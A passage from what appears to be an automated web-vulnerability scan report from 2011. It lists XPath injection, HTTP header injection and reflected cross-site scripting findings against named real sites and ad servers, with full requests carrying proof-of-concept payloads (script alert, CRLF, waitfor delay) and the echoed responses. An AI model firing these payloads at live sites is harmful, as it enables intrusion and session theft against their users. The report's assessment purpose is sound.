Path:   /practiceareas/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /practiceareas'/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.30. http://www.hoganlovells.com/ru/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /ru/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /ru',0,0,0)waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:59:29 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6618
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='ru',0,0,0)waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"Verdana
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ru',0,0,0)waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ru',0,0,0)waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.31. http://www.hoganlovells.com/splash/alumni/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /splash/alumni/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /splash'waitfor%20delay'0%3a0%3a20'--/alumni/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:59:14 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6638
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='splash'waitfor%20delay'0:0:20'--/alumni']' has an invalid token.</title>
<style>
body {font-family:"Ver
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash'waitfor%20delay'0:0:20'--/alumni']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash'waitfor%20delay'0:0:20'--/alumni']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.32. http://www.hoganlovells.com/splash/alumni/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /splash/alumni/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /splash/alumni'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:59:32 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6638
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='splash/alumni'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"Ver
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash/alumni'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash/alumni'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

3. HTTP header injection  previous  next
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.



3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9e34b%0d%0a9d55c7da001 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9e34b%0d%0a9d55c7da001;src=1904248;type=leads399;cat=searc191;ord=9131436890456.826? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers-2.htm?c=N
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9e34b
9d55c7da001
;src=1904248;type=leads399;cat=searc191;ord=9131436890456.826:
Date: Sat, 16 Apr 2011 13:47:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 29793%0d%0a6b9998c57bd was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=2190691~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.9050657076295465&flv=29793%0d%0a6b9998c57bd&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.reed-elsevier.com/Pages/Home.aspx
Origin: http://www.reed-elsevier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=2882&BWDate=40640.944213&debuglevel=&FLV=29793
6b9998c57bd
&RES=128&WMPV=0; expires=Fri, 15-Jul-2011 10: 03:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 16 Apr 2011 14:03:33 GMT
Connection: close
Content-Length: 0


3.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 81b10%0d%0a85657bf67be was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=2190691~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.9050657076295465&flv=10.2154&wmpv=0&res=81b10%0d%0a85657bf67be HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.reed-elsevier.com/Pages/Home.aspx
Origin: http://www.reed-elsevier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=FLV=10.2154&RES=81b10
85657bf67be
&WMPV=0; expires=Fri, 15-Jul-2011 10: 03:35 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 16 Apr 2011 14:03:34 GMT
Connection: close
Content-Length: 0


3.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload e1587%0d%0a37fed39d5c was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=2190691~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.9050657076295465&flv=10.2154&wmpv=e1587%0d%0a37fed39d5c&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.reed-elsevier.com/Pages/Home.aspx
Origin: http://www.reed-elsevier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=e1587
37fed39d5c
; expires=Fri, 15-Jul-2011 10: 03:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 16 Apr 2011 14:03:34 GMT
Connection: close
Content-Length: 0


3.5. https://cc.dealer.com/views/login [reseller parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/login

Issue detail

The value of the reseller request parameter is copied into the Location response header. The payload 6bacb%0d%0a504c4ba8636 was submitted in the reseller parameter. This caused a response containing an injected HTTP header.

Request

GET /views/login?sessionTimedOut=true&action=Login&lang=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&password=3&reseller=6bacb%0d%0a504c4ba8636&storeCookie=storeCookie HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.59.10.1303002182

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?loginFailed=true&reseller=6bacb
504c4ba8636
&lang=http: //example.com/?
ns: netsparker056650=vuln
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:59:03 GMT
Connection: keep-alive
Set-Cookie: ssoid=612ebd1c404638d30061b29f0f23881f;path=/;domain=.dealer.com
Set-Cookie: ssoid=612ebd1c404638d30061b29f0f23881f;path=/;domain=.dealer.com;expires=Thu, 01 Jan 1970 00:00:00 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT


4. Cross-site scripting (reflected)  previous  next
There are 327 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



4.1. http://ad.aggregateknowledge.com/iframe!t=624! [clk1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=624!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff22e"><script>alert(1)</script>ac12818f45c was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=624!?che=3157054&clk1=ff22e"><script>alert(1)</script>ac12818f45c HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.kirtsy.com/login.php?return=/submit.php?fc309%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ef2948ed7988=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=804427654888569294; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 15-Apr-2016 14:22:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJaoN4AAAAAAAEAhgEAmQECiAEQAAEAhn46STejmrz8%2FgAAAAAAAAHTAAAAAAAAAogAAAAAAAAAmQAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 16-Apr-2013 14:22:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:22:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="ff22e"><script>alert(1)</script>ac12818f45chttp://ad.aggregateknowledge.com/interaction!che=1936566067?imid=4199949303314971902&ipid=467&caid=134&cgid=153&crid=648&a=CLICK&adid=29&status=0&l=http://www.pantene.com/en-US/news-and-offers/Pages/sa
...[SNIP]...

4.2. http://ad.aggregateknowledge.com/iframe!t=624! [clk1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=624!

Issue detail

The value of the clk1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0834"%3balert(1)//2eb8545037b was submitted in the clk1 parameter. This input was echoed as a0834";alert(1)//2eb8545037b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=624!?che=3157054&clk1=a0834"%3balert(1)//2eb8545037b HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.kirtsy.com/login.php?return=/submit.php?fc309%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ef2948ed7988=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=933114531302223782; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 15-Apr-2016 14:22:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJaoN4AAAAAAAEAhgEAmQECgwEQAAEAhn4dJA%2F%2FFdHHhAAAAAAAAAHTAAAAAAAAAoMAAAAAAAAAmQAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 16-Apr-2013 14:22:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:22:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"a0834";alert(1)//2eb8545037bhttp://ad.aggregateknowledge.com/interaction!che=1154063332?imid=2099820914518640516&ipid=467&caid=134&cgid=153&crid=643&a=CLICK&adid=29&status=0&l=http://www.pantene.com/en-US/news-and-offers/Pages/sa
...[SNIP]...

4.3. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dff2d"-alert(1)-"c09d0074cf was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=dff2d"-alert(1)-"c09d0074cf HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6978
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 17 Apr 2011 15:01:46 GMT
Expires: Sun, 17 Apr 2011 15:01:46 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
QozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=dff2d"-alert(1)-"c09d0074cfhttp://turbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...

4.4. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd9ac"-alert(1)-"804dc1ac7d6 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQcd9ac"-alert(1)-"804dc1ac7d6&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
